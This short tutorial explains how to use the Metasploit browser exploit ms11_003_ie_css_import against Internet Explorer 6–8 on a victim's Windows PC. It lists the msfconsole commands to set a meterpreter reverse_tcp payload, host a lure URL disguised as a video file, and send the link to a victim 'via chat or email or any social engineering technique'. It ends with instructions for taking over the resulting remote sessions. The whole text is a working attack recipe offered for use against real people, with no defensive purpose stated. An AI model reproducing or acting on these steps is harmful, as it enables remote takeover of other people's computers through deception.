This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.

Exploit Targets

0 – Automatic (default)

1 – Internet Explorer 8

2 – Internet Explorer 7

3 – Internet Explorer 6

4 – Debug Target (Crash)

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/ms11_003_ie_css_import

Msf exploit (ms11_003_ie_css_import)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms11_003_ie_css_import)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms11_003_ie_css_import)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms11_003_ie_css_import)>set uripath newhackingvideos.avi (The Url to use for this exploit)

Msf exploit (ms11_003_ie_css_import)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms11_003_ie_css_import)>exploit

Now an URL you should give to your victim http://192.168.1.4:80/newhackingvideos.avi

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“